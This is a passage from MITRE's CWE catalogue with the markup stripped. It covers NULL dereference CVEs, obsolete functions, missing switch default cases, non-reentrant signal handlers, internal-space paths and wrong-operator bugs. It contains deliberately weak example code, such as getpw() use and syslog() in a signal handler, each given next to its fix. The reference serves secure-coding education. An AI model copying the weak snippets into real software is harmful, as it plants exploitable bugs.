possibly crashing the system or causing heap corruption. + https://www.cve.org/CVERecord?id=CVE-2008-0062 + + + CVE-2008-5183 + Chain: unchecked return value can lead to NULL dereference + https://www.cve.org/CVERecord?id=CVE-2008-5183 + + + CVE-2004-0079 + SSL software allows remote attackers to cause a denial of service (crash) via a crafted SSL/TLS handshake that triggers a null dereference. + https://www.cve.org/CVERecord?id=CVE-2004-0079 + + + CVE-2004-0365 + Network monitor allows remote attackers to cause a denial of service (crash) via a malformed RADIUS packet that triggers a null dereference. + https://www.cve.org/CVERecord?id=CVE-2004-0365 + + + CVE-2003-1013 + Network monitor allows remote attackers to cause a denial of service (crash) via a malformed Q.931, which triggers a null dereference. + https://www.cve.org/CVERecord?id=CVE-2003-1013 + + + CVE-2003-1000 + Chat client allows remote attackers to cause a denial of service (crash) via a passive DCC request with an invalid ID number, which causes a null dereference. + https://www.cve.org/CVERecord?id=CVE-2003-1000 + + + CVE-2004-0389 + Server allows remote attackers to cause a denial of service (crash) via malformed requests that trigger a null dereference. + https://www.cve.org/CVERecord?id=CVE-2004-0389 + + + CVE-2004-0119 + OS allows remote attackers to cause a denial of service (crash from null dereference) or execute arbitrary code via a crafted request during authentication protocol selection. + https://www.cve.org/CVERecord?id=CVE-2004-0119 + + + CVE-2004-0458 + Game allows remote attackers to cause a denial of service (server crash) via a missing argument, which triggers a null pointer dereference. + https://www.cve.org/CVERecord?id=CVE-2004-0458 + + + CVE-2002-0401 + Network monitor allows remote attackers to cause a denial of service (crash) or execute arbitrary code via malformed packets that cause a NULL pointer dereference. + https://www.cve.org/CVERecord?id=CVE-2002-0401 + + + + + Null Dereference + + + Null-pointer dereference + + + Null Dereference (Null Pointer Dereference) + + + A9 + Denial of Service + CWE More Specific + + + EXP34-C + Do not dereference null pointers + Exact + + + SFP7 + Faulty Pointer Use + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2009-12-28 + updated Common_Consequences, Demonstrative_Examples, Other_Notes, Potential_Mitigations, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2010-02-16 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2010-06-21 + updated Demonstrative_Examples, Description, Detection_Factors, Potential_Mitigations + + + CWE Content Team + MITRE + 2010-09-27 + updated Demonstrative_Examples, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2014-02-18 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships, Taxonomy_Mappings, White_Box_Definitions + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2019-09-19 + updated References, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2020-06-25 + updated Common_Consequences + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples, Observed_Examples + + + CWE Content Team + MITRE + 2021-07-20 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Alternate_Terms + + + CWE Content Team + MITRE + 2022-06-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Alternate_Terms, Applicable_Platforms, Observed_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Demonstrative_Examples, Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + + + The code uses deprecated or obsolete functions, which suggests that the code has not been actively reviewed or maintained. + + As programming languages evolve, functions occasionally become obsolete due to: + + Advances in the language + Improved understanding of how operations should be performed effectively and securely + Changes in the conventions that govern certain operations + + Functions that are removed are usually replaced by newer counterparts that perform the same task in some different and hopefully improved way. + + + + + + + Indirect + + + + + + + + Implementation + + + + + Other + Quality Degradation + + + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Binary / Bytecode Quality Analysis + + Cost effective for partial coverage: + + Bytecode Weakness Analysis - including disassembler + source code weakness analysis + + + + High + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + + + + SOAR Partial + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Debugger + + + + High + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Manual Source Code Review (not inspections) + + Cost effective for partial coverage: + + Focused Manual Spotcheck - Focused manual analysis of source + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Source Code Quality Analyzer + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + High + + + Automated Static Analysis + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Origin Analysis + + + + High + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Formal Methods / Correct-By-Construction + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + High + + + + + Implementation + Refer to the documentation for the obsolete function in order to determine why it is deprecated or obsolete and to learn about alternative ways to achieve the same functionality. + + + Requirements + Consider seriously the security implications of using an obsolete function. Consider using alternate functions. + + + + + The following code uses the deprecated function getpw() to verify that a plaintext password matches a user's encrypted password. If the password is valid, the function sets result to 1; otherwise it is set to 0. + + ...getpw(uid, pwdline);for (i=0; i<3; i++){cryptpw=strtok(pwdline, ":");pwdline=0;}result = strcmp(crypt(plainpw,cryptpw), cryptpw) == 0;... + + Although the code often behaves correctly, using the getpw() function can be problematic from a security standpoint, because it can overflow the buffer passed to its second parameter. Because of this vulnerability, getpw() has been supplanted by getpwuid(), which performs the same lookup as getpw() but returns a pointer to a statically-allocated structure to mitigate the risk. Not all functions are deprecated or replaced because they pose a security risk. However, the presence of an obsolete function often indicates that the surrounding code has been neglected and may be in a state of disrepair. Software security has not been a priority, or even a consideration, for very long. If the program uses deprecated or obsolete functions, it raises the probability that there are security problems lurking nearby. + + + In the following code, the programmer assumes that the system always has a property named "cmd" defined. If an attacker can control the program's environment so that "cmd" is not defined, the program throws a null pointer exception when it attempts to call the "Trim()" method. + + String cmd = null;...cmd = Environment.GetEnvironmentVariable("cmd");cmd = cmd.Trim(); + + + + The following code constructs a string object from an array of bytes and a value that specifies the top 8 bits of each 16-bit Unicode character. + + ...String name = new String(nameBytes, highByte);... + + In this example, the constructor may not correctly convert bytes to characters depending upon which charset is used to encode the string represented by nameBytes. Due to the evolution of the charsets used to encode strings, this constructor was deprecated and replaced by a constructor that accepts as one of its parameters the name of the charset used to encode the bytes for conversion. + + + + + Obsolete + + + SFP3 + Use of an improper API + + + DCL30-PL + Do not import deprecated modules + CWE More Specific + + + EXP30-PL + Do not use deprecated or obsolete functions or modules + CWE More Specific + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Other_Notes + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Description, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Name, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Obsolete + Use of Obsolete Functions + + + + The code does not have a default case in an expression with multiple conditions, such as a switch statement. + If a multiple-condition expression (such as a switch in C) omits the default case but does not consider or handle all possible values that could occur, then this might lead to complex logical errors and resultant weaknesses. Because of this, further decisions are made based on poor information, and cascading failure results. This cascading failure may result in any number of security issues, and constitutes a significant failure in the system. + + + + + + Primary + + + + + + + + + + + + + Implementation + + + + + Integrity + Varies by Context + Alter Execution Logic + Depending on the logical circumstances involved, any consequences may result: e.g., issues of confidentiality, authentication, authorization, availability, integrity, accountability, or non-repudiation. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Ensure that there are no cases unaccounted for when adjusting program flow or values based on the value of a given variable. In the case of switch style statements, the very simple act of creating a default case can, if done correctly, mitigate this situation. Often however, the default case is used simply to represent an assumed option, as opposed to working as a check for invalid input. This is poor practice and in some cases is as bad as omitting a default case entirely. + + + + + The following does not properly check the return code in the case where the security_check function returns a -1 value when an error occurs. If an attacker can supply data that will invoke an error, the attacker can bypass the security check: + + #define FAILED 0#define PASSED 1int result;...result = security_check(data);switch (result) { + case FAILED:printf("Security check failed!\n");exit(-1); + //Break never reached because of exit() + break; + case PASSED:printf("Security check passed.\n");break; + + } + // program execution continues... + ... + + Instead a default label should be used for unaccounted conditions: + + #define FAILED 0#define PASSED 1int result;...result = security_check(data);switch (result) { + case FAILED:printf("Security check failed!\n");exit(-1); + //Break never reached because of exit() + break; + case PASSED:printf("Security check passed.\n");break; + default:printf("Unknown error (%d), exiting...\n",result);exit(-1); + + } + + This label is used because the assumption cannot be made that all possible cases are accounted for. A good practice is to reserve the default case for error handling. + + + In the following Java example the method getInterestRate retrieves the interest rate for the number of points for a mortgage. The number of points is provided within the input parameter and a switch statement will set the interest rate value to be returned based on the number of points. + + public static final String INTEREST_RATE_AT_ZERO_POINTS = "5.00";public static final String INTEREST_RATE_AT_ONE_POINTS = "4.75";public static final String INTEREST_RATE_AT_TWO_POINTS = "4.50";...public BigDecimal getInterestRate(int points) { + BigDecimal result = new BigDecimal(INTEREST_RATE_AT_ZERO_POINTS); + switch (points) { + case 0:result = new BigDecimal(INTEREST_RATE_AT_ZERO_POINTS);break; + case 1:result = new BigDecimal(INTEREST_RATE_AT_ONE_POINTS);break; + case 2:result = new BigDecimal(INTEREST_RATE_AT_TWO_POINTS);break; + + }return result; + } + + However, this code assumes that the value of the points input parameter will always be 0, 1 or 2 and does not check for other incorrect values passed to the method. This can be easily accomplished by providing a default label in the switch statement that outputs an error message indicating an invalid value for the points input parameter and returning a null value. + + public static final String INTEREST_RATE_AT_ZERO_POINTS = "5.00";public static final String INTEREST_RATE_AT_ONE_POINTS = "4.75";public static final String INTEREST_RATE_AT_TWO_POINTS = "4.50";...public BigDecimal getInterestRate(int points) { + BigDecimal result = new BigDecimal(INTEREST_RATE_AT_ZERO_POINTS); + switch (points) { + case 0:result = new BigDecimal(INTEREST_RATE_AT_ZERO_POINTS);break; + case 1:result = new BigDecimal(INTEREST_RATE_AT_ONE_POINTS);break; + case 2:result = new BigDecimal(INTEREST_RATE_AT_TWO_POINTS);break; + default:System.err.println("Invalid value for points, must be 0, 1 or 2");System.err.println("Returning null value for interest rate");result = null; + + } + return result; + } + + + + In the following Python example the match-case statements (available in Python version 3.10 and later) perform actions based on the result of the process_data() function. The expected return is either 0 or 1. However, if an unexpected result (e.g., -1 or 2) is obtained then no actions will be taken potentially leading to an unexpected program state. + + result = process_data(data) + match result: + case 0: + print("Properly handle zero case.") + case 1: + print("Properly handle one case.") + + # program execution continues... + + The recommended approach is to add a default case that captures any unexpected result conditions, regardless of how improbable these unexpected conditions might be, and properly handles them. + + result = process_data(data) + match result: + case 0: + print("Properly handle zero case.") + case 1: + print("Properly handle one case.") + case _: + print("Properly handle unexpected condition.") + + # program execution continues... + + + + In the following JavaScript example the switch-case statements (available in JavaScript version 1.2 and later) are used to process a given step based on the result of a calcuation involving two inputs. The expected return is either 1, 2, or 3. However, if an unexpected result (e.g., 4) is obtained then no action will be taken potentially leading to an unexpected program state. + + let step = input1 + input2; + switch(step) { + case 1: + alert("Process step 1."); + break; + case 2: + alert("Process step 2."); + break; + case 3: + alert("Process step 3."); + break; + + } + // program execution continues... + + The recommended approach is to add a default case that captures any unexpected result conditions and properly handles them. + + let step = input1 + input2; + switch(step) { + case 1: + alert("Process step 1."); + break; + case 2: + alert("Process step 2."); + break; + case 3: + alert("Process step 3."); + break; + default: + alert("Unexpected step encountered."); + + } + // program execution continues... + + + + The Finite State Machine (FSM) shown in the "bad" code snippet below assigns the output ("out") based on the value of state, which is determined based on the user provided input ("user_input"). + + module fsm_1(out, user_input, clk, rst_n); + input [2:0] user_input; + input clk, rst_n; + output reg [2:0] out; + reg [1:0] state; + always @ (posedge clk or negedge rst_n ) + + begin + + + if (!rst_n) + + state = 3'h0; + + else + case (user_input) + + 3'h0: + 3'h1: + 3'h2: + 3'h3: state = 2'h3; + 3'h4: state = 2'h2; + 3'h5: state = 2'h1; + + endcase + + end + out <= {1'h1, state}; + + endmodule + + + + The case statement does not include a default to handle the scenario when the user provides inputs of 3'h6 and 3'h7. Those inputs push the system to an undefined state and might cause a crash (denial of service) or any other unanticipated outcome. + Adding a default statement to handle undefined inputs mitigates this issue. This is shown in the "Good" code snippet below. The default statement is in bold. + + + case (user_input) + 3'h0: + 3'h1: + 3'h2: + 3'h3: state = 2'h3; + 3'h4: state = 2'h2; + 3'h5: state = 2'h1; + default: state = 2'h0; + + endcase + + + + + + Failure to account for default case in switch + + + SFP4 + Unchecked Status Condition + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Name + + + CWE Content Team + MITRE + 2010-06-21 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Description, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships, Type + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Drew Buttner + 2022-08-15 + Suggested name change and other modifications, including a new demonstrative example. + + Failure to Account for Default Case in Switch + Failure to Use Default Case in Switch + Missing Default Case in Switch Statement + + + + The product defines a signal handler that calls a non-reentrant function. + + Non-reentrant functions are functions that cannot safely be called, interrupted, and then recalled before the first call has finished without resulting in memory corruption. This can lead to an unexpected system state and unpredictable results with a variety of potential consequences depending on context, including denial of service and code execution. + Many functions are not reentrant, but some of them can result in the corruption of memory if they are used in a signal handler. The function call syslog() is an example of this. In order to perform its functionality, it allocates a small amount of memory as "scratch space." If syslog() is suspended by a signal call and the signal handler calls syslog(), the memory used by both of these functions enters an undefined, and possibly, exploitable state. Implementations of malloc() and free() manage metadata in global structures in order to track which memory is allocated versus which memory is available, but they are non-reentrant. Simultaneous calls to these functions can cause corruption of the metadata. + + + + + + + + + + + + + Implementation + + + Low + + + Integrity + Confidentiality + Availability + Execute Unauthorized Code or Commands + It may be possible to execute arbitrary code through the use of a write-what-where condition. + + + Integrity + Modify Memory + Modify Application Data + Signal race conditions often result in data corruption. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Requirements + Require languages or libraries that provide reentrant functionality, or otherwise make it easier to avoid this weakness. + + + Architecture and Design + Design signal handlers to only set flags rather than perform complex functionality. + + + Implementation + Ensure that non-reentrant functions are not found in signal handlers. + + + Implementation + Use sanity checks to reduce the timing window for exploitation of race conditions. This is only a partial solution, since many attacks might fail, but other attacks still might work within the narrower window, even accidentally. + Defense in Depth + + + + + In this example, a signal handler uses syslog() to log a message: + + char *message;void sh(int dummy) {syslog(LOG_NOTICE,"%s\n",message);sleep(10);exit(0);}int main(int argc,char* argv[]) {...signal(SIGHUP,sh);signal(SIGTERM,sh);sleep(10);exit(0);}If the execution of the first call to the signal handler is suspended after invoking syslog(), and the signal handler is called a second time, the memory allocated by syslog() enters an undefined, and possibly, exploitable state. + + + + + + + CVE-2005-0893 + signal handler calls function that ultimately uses malloc() + https://www.cve.org/CVERecord?id=CVE-2005-0893 + + + CVE-2004-2259 + SIGCHLD signal to FTP server can cause crash under heavy load while executing non-reentrant functions like malloc/free. + https://www.cve.org/CVERecord?id=CVE-2004-2259 + + + + System Process + + + + Unsafe function call from a signal handler + + + SIG30-C + Call only asynchronous-safe functions within signal handlers + Exact + + + SIG34-C + Do not call signal() from within interruptible signal handlers + + + EXP01-J + Never dereference null pointers + + + SFP3 + Use of an improper API + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-09-27 + updated Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Demonstrative_Examples, Description, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Observed_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, References, Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Common_Consequences + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Unsafe Function Call from a Signal Handler + + + + The product accepts path input in the form of internal space ('file(SPACE)name') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + CVE-2000-0293 + Filenames with spaces allow arbitrary file deletion when the product does not properly quote them; some overlap with path traversal. + https://www.cve.org/CVERecord?id=CVE-2000-0293 + + + CVE-2001-1567 + "+" characters in query string converted to spaces before sensitive file/extension (internal space), leading to bypass of access restrictions to the file. + https://www.cve.org/CVERecord?id=CVE-2001-1567 + + + + + file(SPACE)name (internal space) + + + A9 + Denial of Service + CWE More Specific + + + SFP16 + Path Traversal + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This weakness is likely to overlap quoting problems, e.g. the "Program Files" unquoted search path (CWE-428). It also could be an equivalence issue if filtering removes all extraneous spaces. + Whitespace can be a factor in other weaknesses not directly related to equivalence. It can also be used to spoof icons or hide files with dangerous names (see icon manipulation and visual truncation in CWE-451). + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Applicable_Platforms, Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Internal Space - file(SPACE)name + + + + The product accidentally uses the wrong operator, which changes the logic in security-relevant ways. + These types of errors are generally the result of a typo by the programmer. + + + + + + + + + + + + Implementation + + + Low + + + Other + Alter Execution Logic + This weakness can cause unintended logic to be executed and other unexpected application behavior. + + + + + Automated Static Analysis + This weakness can be found easily using static analysis. However in some cases an operator might appear to be incorrect, but is actually correct and reflects unusual logic within the program. + + + Manual Static Analysis + This weakness can be found easily using static analysis. However in some cases an operator might appear to be incorrect, but is actually correct and reflects unusual logic within the program. + + + + + The following C/C++ and C# examples attempt to validate an int input parameter against the integer value 100. + + int isValid(int value) {if (value=100) {printf("Value is valid\n");return(1);}printf("Value is not valid\n");return(0);} + + + bool isValid(int value) {if (value=100) {Console.WriteLine("Value is valid.");return true;}Console.WriteLine("Value is not valid.");return false;} + + However, the expression to be evaluated in the if statement uses the assignment operator "=" rather than the comparison operator "==". The result of using the assignment operator instead of the comparison operator causes the int variable to be reassigned locally and the expression in the if statement will always evaluate to the value on the right hand side of the expression. This will result in the input value not being properly validated, which can cause unexpected results. + + + The following C/C++ example shows a simple implementation of a stack that includes methods for adding and removing integer values from the stack. The example uses pointers to add and remove integer values to the stack array variable. + + #define SIZE 50int *tos, *p1, stack[SIZE]; + void push(int i) { + p1++;if(p1==(tos+SIZE)) { + + + // Print stack overflow error message and exit + + + }*p1 == i; + } + int pop(void) { + if(p1==tos) { + + + // Print stack underflow error message and exit + + + }p1--;return *(p1+1); + } + int main(int argc, char *argv[]) { + + + // initialize tos and p1 to point to the top of stack + tos = stack;p1 = stack; + // code to add and remove items from stack + ...return 0; + } + + The push method includes an expression to assign the integer value to the location in the stack pointed to by the pointer variable. + However, this expression uses the comparison operator "==" rather than the assignment operator "=". The result of using the comparison operator instead of the assignment operator causes erroneous values to be entered into the stack and can cause unexpected results. + + + + + CVE-2021-3116 + Chain: Python-based HTTP Proxy server uses the wrong boolean operators (CWE-480) causing an incorrect comparison (CWE-697) that identifies an authN failure if all three conditions are met instead of only one, allowing bypass of the proxy authentication (CWE-1390) + https://www.cve.org/CVERecord?id=CVE-2021-3116 + + + + + Using the wrong operator + + + EXP45-C + Do not perform assignments in selection statements + CWE More Abstract + + + EXP46-C + Do not use a bitwise operator with a Boolean-like operand + CWE More Abstract + + + SFP1 + Glitch in Computation + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Relationships + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Applicable_Platforms, Description, Detection_Factors, Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Observed_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Using the Wrong Operator + + + + The code uses an operator for assignment when the intention was to perform a comparison. + In many languages the compare statement is very close in appearance to the assignment statement and are often confused. This bug is generally the result of a typo and usually causes obvious problems with program execution. If the comparison is in an if statement, the if statement will usually evaluate the value of the right-hand side of the predicate. + + + + + + + + + + + + + Implementation + + + Low + + + Other + Alter Execution Logic + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Testing + Many IDEs and static analysis products will detect this problem. + + + Implementation + Place constants on the left. If one attempts to assign a constant with a variable, the compiler will produce an error. + + + + + The following C/C++ and C# examples attempt to validate an int input parameter against the integer value 100. + + int isValid(int value) {if (value=100) {printf("Value is valid\n");return(1);}printf("Value is not valid\n");return(0);} + + + bool isValid(int value) {if (value=100) {Console.WriteLine("Value is valid.");return 